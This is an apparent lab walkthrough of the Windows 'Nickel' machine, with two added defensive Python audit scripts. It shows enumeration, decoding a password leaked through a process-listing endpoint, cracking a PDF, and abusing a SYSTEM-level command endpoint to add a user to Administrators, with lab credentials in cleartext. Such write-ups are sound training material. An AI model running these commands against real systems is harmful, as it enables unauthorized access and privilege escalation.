# Nickel

## Summary

### General information

|            |                                                 |
| ---------- | ----------------------------------------------- |
| **Level**  | <mark style="color:orange;">Intermediate</mark> |
| **System** | Windows                                         |

### Spoiler! - Roadmap

A fairly simple machine in which leaked credentials are obtained from a file on an exposed web service. Those credentials are then used to log in over SSH and retrieve a PDF containing interesting information: it points to a web service that runs with administrator privileges and through which commands can be executed.

The steps are listed in more detail:

1. Service enumeration, finding a web service with an endpoint that shows information about the credentials of the user `ariah`.
2. SSH access and retrieval of a password-protected PDF file from the `ftp` service folder.
3. Cracking the PDF file and recovering its password with the `rockyou.txt` wordlist.
4. Information in the file about an endpoint that allows command execution as `nt authority\system`.
5. `ariah` is added to the administrators group and `PWNED!`.

## Enumeration

### Scanning with nmap

Basic enumeration of all services over TCP, UDP and SCTP:

```bash
IP=192.168.155.99
nmap -v -T4 -Pn -n -sS -F -oA nmap/tcp $IP
nmap -T4 -Pn -n -sY -F -oA nmap/sctp $IP
nmap -T4 -Pn -n -sU -p 53,69,111,123,137,161,500,514,520,623 -oA nmap/udp $IP
```

Port and service scan with scripts for the top 1000 ports over TCP and UDP, and all ports over TCP:

```bash
nmap -T4 -Pn --open -sS --script=default,version,vuln -A -oA nmap/tcp-1000-scripts $IP
nmap -T4 -Pn --open --script=default,version,vuln -A -p- -oA nmap/tcp-full-scripts $IP
nmap -T3 -Pn --open -sU -sV -oA nmap/udp-1000 $IP
```

#### nmap results

The second scan (`nmap -T4 -Pn --open --script=default,version,vuln -A -p- -oA nmap/tcp-full-scripts $IP`) gives the following information:

```
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           FileZilla ftpd
| ftp-syst: 
|_  SYST: UNIX emulated by FileZilla
22/tcp    open  ssh           OpenSSH for_Windows_8.1 (protocol 2.0)
| ssh-hostkey: 
|   3072 8684fdd5432705cfa7f2e9e27570d5f3 (RSA)
|   256 9c93cf48a94e70f460dee1a9c2c0b6ff (ECDSA)
|_  256 004ed73b0f9fe3744d04990bb18bdea5 (ED25519)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2023-02-19T12:21:38+00:00; 0s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: NICKEL
|   NetBIOS_Domain_Name: NICKEL
|   NetBIOS_Computer_Name: NICKEL
|   DNS_Domain_Name: nickel
|   DNS_Computer_Name: nickel
|   Product_Version: 10.0.18362
|_  System_Time: 2023-02-19T12:19:27+00:00
| ssl-cert: Subject: commonName=nickel
| Not valid before: 2023-02-18T12:02:35
|_Not valid after:  2023-08-20T12:02:35
8089/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-majordomo2-dir-traversal: ERROR: Script execution failed (use -d to debug)
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.223.99
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.223.99:8089/
|     Form id: 
|     Form action: http://169.254.109.39:33333/list-current-deployments
|     
|     Path: http://192.168.223.99:8089/
|     Form id: 
|     Form action: http://169.254.109.39:33333/list-running-procs
|     
|     Path: http://192.168.223.99:8089/
|     Form id: 
|_    Form action: http://169.254.109.39:33333/list-active-nodes
|_http-title: Site doesn't have a title.
|_http-vuln-cve2013-7091: ERROR: Script execution failed (use -d to debug)
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
33333/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-vuln-cve2013-7091: ERROR: Script execution failed (use -d to debug)
| http-phpmyadmin-dir-traversal: 
|   VULNERABLE:
|   phpMyAdmin grab_globals.lib.php subform Parameter Traversal Local File Inclusion
|     State: UNKNOWN (unable to test)
|     IDs:  CVE:CVE-2005-3299
|       PHP file inclusion vulnerability in grab_globals.lib.php in phpMyAdmin 2.6.4 and 2.6.4-pl1 allows remote attackers to include local files via the $__redirect parameter, possibly involving the subform array.
|       
|     Disclosure date: 2005-10-nil
|     Extra information:
|       ../../../../../etc/passwd :
|   <p>Not Implemented</p>
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3299
|_      http://www.exploit-db.com/exploits/1244/
|_http-majordomo2-dir-traversal: ERROR: Script execution failed (use -d to debug)
|_http-title: Site doesn't have a title.
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: WAP|phone
Running: Linux 2.4.X|2.6.X, Sony Ericsson embedded
OS CPE: cpe:/o:linux:linux_kernel:2.4.20 cpe:/o:linux:linux_kernel:2.6.22 cpe:/h:sonyericsson:u8i_vivaz
OS details: Tomato 1.28 (Linux 2.4.20), Tomato firmware (Linux 2.6.22), Sony Ericsson U8i Vivaz mobile phone
Network Distance: 3 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-vuln-cve2009-3103: 
|   VULNERABLE:
|   SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2009-3103
|           Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
|           Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a
|           denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE
|           PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
|           aka "SMBv2 Negotiation Vulnerability."
|           
|     Disclosure date: 2009-09-08
|     References:
|       http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_smb-vuln-ms10-061: SMB: Couldn't find a NetBIOS name that works for the server. Sorry!
|_smb-vuln-ms10-054: false
|_smb2-time: ERROR: Script execution failed (use -d to debug)
|_samba-vuln-cve-2012-1182: SMB: Couldn't find a NetBIOS name that works for the server. Sorry!
|_smb2-security-mode: SMB: Couldn't find a NetBIOS name that works for the server. Sorry!
```

### Scan analysis

Several URLs and open services are found; after a basic enumeration of each one, an endpoint turns out to be interesting.

```
http://169.254.109.39:33333/list-running-procs
```

Modifying the request so that it targets the victim machine's IP and is sent with the HTTP POST method instead of GET, the following is obtained:

```
POST /list-running-procs HTTP/1.1
Host: 192.168.155.99:33333
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 0

```

```
name        : System Idle Process
commandline : 

name        : System
commandline : 

name        : Registry
commandline : 

name        : smss.exe
commandline : 

name        : csrss.exe
commandline : 

name        : wininit.exe
commandline : 

name        : csrss.exe
commandline : 

name        : winlogon.exe
commandline : winlogon.exe

name        : services.exe
commandline : 

name        : lsass.exe
commandline : C:\Windows\system32\lsass.exe

name        : fontdrvhost.exe
commandline : "fontdrvhost.exe"

name        : fontdrvhost.exe
commandline : "fontdrvhost.exe"

name        : dwm.exe
commandline : "dwm.exe"

name        : powershell.exe
commandline : powershell.exe -nop -ep bypass C:\windows\system32\ws80.ps1

name        : Memory Compression
commandline : 

name        : cmd.exe
commandline : cmd.exe C:\windows\system32\DevTasks.exe --deploy C:\work\dev.yaml --user ariah -p 
              "Tm93aXNlU2xvb3BUaGVvcnkxMzkK" --server nickel-dev --protocol ssh

name        : powershell.exe
commandline : powershell.exe -nop -ep bypass C:\windows\system32\ws8089.ps1

name        : powershell.exe
commandline : powershell.exe -nop -ep bypass C:\windows\system32\ws33333.ps1

name        : spoolsv.exe
commandline : C:\Windows\System32\spoolsv.exe

name        : conhost.exe
commandline : \??\C:\Windows\system32\conhost.exe 0x4

name        : FileZilla Server.exe
commandline : "C:\Program Files (x86)\FileZilla Server\FileZilla Server.exe"

name        : sshd.exe
commandline : "C:\Program Files\OpenSSH\OpenSSH-Win64\sshd.exe"

name        : VGAuthService.exe
commandline : "C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe"

name        : vmtoolsd.exe
commandline : "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"

name        : dllhost.exe
commandline : C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235}

name        : WmiPrvSE.exe
commandline : C:\Windows\system32\wbem\wmiprvse.exe

name        : LogonUI.exe
commandline : "LogonUI.exe" /flags:0x2 /state0:0xa392c855 /state1:0x41c64e6d

name        : msdtc.exe
commandline : C:\Windows\System32\msdtc.exe

name        : conhost.exe
commandline : \??\C:\Windows\system32\conhost.exe 0x4

name        : conhost.exe
commandline : \??\C:\Windows\system32\conhost.exe 0x4

name        : conhost.exe
commandline : \??\C:\Windows\system32\conhost.exe 0x4

name        : WmiPrvSE.exe
commandline : C:\Windows\system32\wbem\wmiprvse.exe

name        : SgrmBroker.exe
commandline : 

name        : SearchIndexer.exe
commandline : C:\Windows\system32\SearchIndexer.exe /Embedding

name        : WmiApSrv.exe
commandline : C:\Windows\system32\wbem\WmiApSrv.exe

name        : CompatTelRunner.exe
commandline : C:\Windows\system32\compattelrunner.exe

name        : conhost.exe
commandline : \??\C:\Windows\system32\conhost.exe 0x4

name        : CompatTelRunner.exe
commandline : C:\Windows\system32\compattelrunner.exe -maintenance

name        : conhost.exe
commandline : \??\C:\Windows\system32\conhost.exe 0x4
```

Among the information, we obtain a username and a password which, from its characteristics, we deduce is base64-encoded.

```
name        : cmd.exe
commandline : cmd.exe C:\windows\system32\DevTasks.exe --deploy C:\work\dev.yaml --user ariah -p 
              "Tm93aXNlU2xvb3BUaGVvcnkxMzkK" --server nickel-dev --protocol ssh
```

We decode the string and obtain `ariah`'s password:

```
echo -n Tm93aXNlU2xvb3BUaGVvcnkxMzkK | base64 --decode
```

```
NowiseSloopTheory139
```
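From a defender's point of view, the problem here is that `list-running-procs` echoes full process command lines, and command lines are a classic place for secrets to leak. The following Python script is an added example, not code from the original write-up or from the machine: it parses output in the same `name : ... / commandline : ...` layout (including the wrapped continuation line), flags arguments that look like passwords, tries to base64-decode them, and also flags PowerShell started with `-ep bypass`, as the three `ws*.ps1` web servers on this box are. The process excerpt is constructed from the page's output; the list of password flag names is an assumption.

```python
import base64
import binascii
import re

# Constructed excerpt of the ``list-running-procs`` output shown in the write-up;
# the cmd.exe entry keeps the wrapped continuation line as the endpoint printed it.
SAMPLE_PROCS = r"""
name        : lsass.exe
commandline : C:\Windows\system32\lsass.exe

name        : powershell.exe
commandline : powershell.exe -nop -ep bypass C:\windows\system32\ws80.ps1

name        : cmd.exe
commandline : cmd.exe C:\windows\system32\DevTasks.exe --deploy C:\work\dev.yaml --user ariah -p
              "Tm93aXNlU2xvb3BUaGVvcnkxMzkK" --server nickel-dev --protocol ssh

name        : sshd.exe
commandline : "C:\Program Files\OpenSSH\OpenSSH-Win64\sshd.exe"
"""

# Argument names after which a secret is commonly passed on the command line.
# ``-p`` is the form seen on this machine; the other names are assumptions.
SECRET_FLAGS = re.compile(
    r'(?:^|\s)(?:--password|--pass|-pw|-p|/password:)\s*"?([^"\s]+)"?',
    re.IGNORECASE,
)
USER_FLAG = re.compile(r"(?:--user|-u)\s+(\S+)", re.IGNORECASE)
# PowerShell launched with its execution policy bypassed.
EP_BYPASS = re.compile(
    r"powershell(?:\.exe)?\b.*-(?:ep|executionpolicy|exec)\s+bypass", re.IGNORECASE
)


def parse_process_list(text):
    """Parse Format-List style ``key : value`` records separated by blank lines.

    A line that starts with whitespace continues the previous value (wrapped output).
    """
    records, current, last_key = [], {}, None
    for raw in text.splitlines():
        if not raw.strip():
            if current:
                records.append(current)
            current, last_key = {}, None
            continue
        if raw[0].isspace() and last_key is not None:
            current[last_key] = (current[last_key] + " " + raw.strip()).strip()
            continue
        key, _, value = raw.partition(":")
        last_key = key.strip().lower()
        current[last_key] = value.strip()
    if current:
        records.append(current)
    return records


def try_base64(token):
    """Return the decoded text if ``token`` is strict base64 for printable UTF-8, else None."""
    try:
        text = base64.b64decode(token, validate=True).decode("utf-8").strip()
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if text and text.isprintable() else None


def audit_process_list(text):
    """Return findings: secrets passed as arguments, and PowerShell run with -ep bypass."""
    findings = []
    for rec in parse_process_list(text):
        name, cmd = rec.get("name"), rec.get("commandline", "")
        user = USER_FLAG.search(cmd)
        for match in SECRET_FLAGS.finditer(cmd):
            token = match.group(1)
            findings.append({
                "type": "secret_on_cmdline",
                "process": name,
                "user": user.group(1) if user else None,
                "token": token,
                "decoded": try_base64(token),  # None when the argument is not base64
            })
        if EP_BYPASS.search(cmd):
            findings.append({"type": "powershell_ep_bypass", "process": name, "commandline": cmd})
    return findings


if __name__ == "__main__":
    for finding in audit_process_list(SAMPLE_PROCS):
        print(finding)
```

The same parser works on the output of `Get-Process | Format-List Name, CommandLine` or `Get-CimInstance Win32_Process`, so the check can run as a scheduled audit on the host itself rather than against the exposed endpoint.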

## Exploitation

### Direct access to the system

Once valid credentials for the server have been obtained, we try them against the available services, among them `ssh` and `ftp`:

```
ssh ariah@192.168.155.99
```

```
ftp ftp://ariah:NowiseSloopTheory139@192.168.155.99
```

### Post-enumeration

A basic enumeration of the system shows that there is a file named `Infrastructure.pdf` in the FTP service.

To download it over SSH:

```
scp ariah@192.168.155.99:C:/ftp/Infrastructure.pdf .
```

When trying to open the file, it turns out to be password-protected, so we run a dictionary attack with `pdfcrack` using the `rockyou.txt` wordlist:

```
pdfcrack -f Infrastructure.pdf -w /usr/share/wordlists/rockyou.txt
```

<figure><img src="https://940481291-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFPk1C70Fp5SRurFLmfzj%2Fuploads%2FJ3dkM9acw1MJl94IfmMS%2FPasted%20image%2020230226215055.png?alt=media&#x26;token=e6f61d6f-bf34-4b25-abe5-a6cb9f4a94dd" alt=""><figcaption></figcaption></figure>

The password turns out to be: `ariah4168`

<figure><img src="https://940481291-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFPk1C70Fp5SRurFLmfzj%2Fuploads%2Fij5qKCrAtl45ETOd2DWh%2FPasted%20image%2020230226215902.png?alt=media&#x26;token=ea51e6a8-e1a7-4147-b16c-13de27bf4041" alt=""><figcaption></figcaption></figure>

The "Temporary Command" endpoint looks like it might allow command execution; let's see whether we are lucky and the service happens to be running as `Administrator`.

{% tabs %}
{% tab title="Curl" %}
From the SSH session, `curl` is run against the *endpoint* with the `whoami` command:

```
curl http://localhost/?whoami
```

The following response is obtained:

```
<!doctype html><html><body>dev-api started at 2020-10-20T10:38:24

        <pre>nt authority\system
</pre>
</body></html>
```

{% endtab %}

{% tab title="Powershell" %}
We run the following to switch to `powershell`:

```
ariah@NICKEL C:\>powershell.exe
```

The request is made and the response content is retrieved:

```
$response = Invoke-WebRequest 'http://localhost/?whoami' -UseBasicParsing
$response.RawContent
```

The following response is obtained:

```
PS C:\ftp> $response = Invoke-WebRequest 'http://localhost/?whoami' -UseBasicParsing
PS C:\ftp> $response.RawContent
HTTP/1.1 200 OK
Content-Length: 118
Date: Sun, 26 Feb 2023 21:12:33 GMT
Last-Modified: Sun, 26 Feb 2023 13:12:33 GMT
Server: Powershell Webserver/1.2 on Microsoft-HTTPAPI/2.0

<!doctype html><html><body>dev-api started at 2020-10-20T10:38:24

        <pre>nt authority\system
</pre>
</body></html>
```

{% endtab %}
{% endtabs %}

## Privilege escalation

`ariah` is added to the administrators group through the endpoint:

```
net localgroup Administrators ariah /add
```

The string is URL-encoded so that it can be sent in the URL:

<https://meyerweb.com/eric/tools/dencoder/>

The command is executed and a successful response is obtained:

```
$response = Invoke-WebRequest 'http://localhost/?net%20localgroup%20Administrators%20ariah%20%2Fadd' -UseBasicParsing
$response.RawContent
```

```
PS C:\Users\Administrator> $response = Invoke-WebRequest 'http://localhost/?net%20localgroup%20Administrators%20ariah%20%2Fadd' -UseBasicParsing
PS C:\Users\Administrator> $response.RawContent
HTTP/1.1 200 OK
Content-Length: 136
Date: Sun, 26 Feb 2023 21:19:54 GMT
Last-Modified: Sun, 26 Feb 2023 13:19:54 GMT
Server: Powershell Webserver/1.2 on Microsoft-HTTPAPI/2.0

<!doctype html><html><body>dev-api started at 2020-10-20T10:38:24

        <pre>The command completed successfully.

</pre>
</body></html>
```

We verify that the user has been added to the administrators group:

```
PS C:\Users\Administrator> net localgroup Administrators 
Alias name     Administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
ariah
The command completed successfully.

```
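The change made above is exactly what a periodic local-group audit should catch. As an added example (not from the original write-up), the Python below parses `net localgroup Administrators` output in the layout shown above and reports any member that is not in an approved baseline. It also handles the multi-column layout `net.exe` switches to when a group has many members, which goes beyond the page's two-member case. The first sample is copied from the page's output, the second is constructed, and the baseline is an assumption.

```python
import re

# Constructed from the output shown in the write-up.
SAMPLE_NET_LOCALGROUP = """\
Alias name     Administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
ariah
The command completed successfully.
"""

# Constructed: the multi-column layout net.exe uses for larger groups (members are made up).
SAMPLE_NET_LOCALGROUP_COLUMNS = """\
Alias name     Administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator            Domain Admins            ariah
svc-backup
The command completed successfully.
"""

# Assumed baseline: the only account that is supposed to be a local administrator.
DEFAULT_BASELINE = ("Administrator",)


def parse_net_localgroup(text):
    """Return the member names listed in ``net localgroup <group>`` output.

    Members start after the dashed separator and end at the "The command completed"
    line; a row may hold several names separated by runs of two or more spaces.
    """
    members, in_members = [], False
    for line in text.splitlines():
        stripped = line.strip()
        if not in_members:
            if stripped.startswith("---"):
                in_members = True
            continue
        if stripped.startswith("The command completed"):
            break
        if not stripped:
            continue
        # Names may contain a single space ("Domain Admins"); columns are 2+ spaces apart.
        members.extend(part for part in re.split(r"\s{2,}", stripped) if part)
    return members


def unexpected_admins(text, baseline=DEFAULT_BASELINE):
    """Return members present in the output but not in the baseline (case-insensitive)."""
    approved = {name.casefold() for name in baseline}
    return [name for name in parse_net_localgroup(text) if name.casefold() not in approved]


if __name__ == "__main__":
    for extra in unexpected_admins(SAMPLE_NET_LOCALGROUP):
        print(f"unexpected local administrator: {extra}")
```

On a live host the text would come from running `net localgroup Administrators` (or from `Get-LocalGroupMember Administrators`, whose object output needs no parsing at all); either way, alerting on the diff against a baseline is the check that would have flagged `ariah` the moment she was added.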

And now the flag on the administrator's desktop can be read:

```
type C:\Users\Administrator\Desktop\proof.txt
```

<figure><img src="https://940481291-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFPk1C70Fp5SRurFLmfzj%2Fuploads%2F0yA3iEz0BXMExqYtfC9F%2Fpanda.gif?alt=media&#x26;token=b6d9028c-03a6-412a-ab50-f316153ac81c" alt=""><figcaption></figcaption></figure>
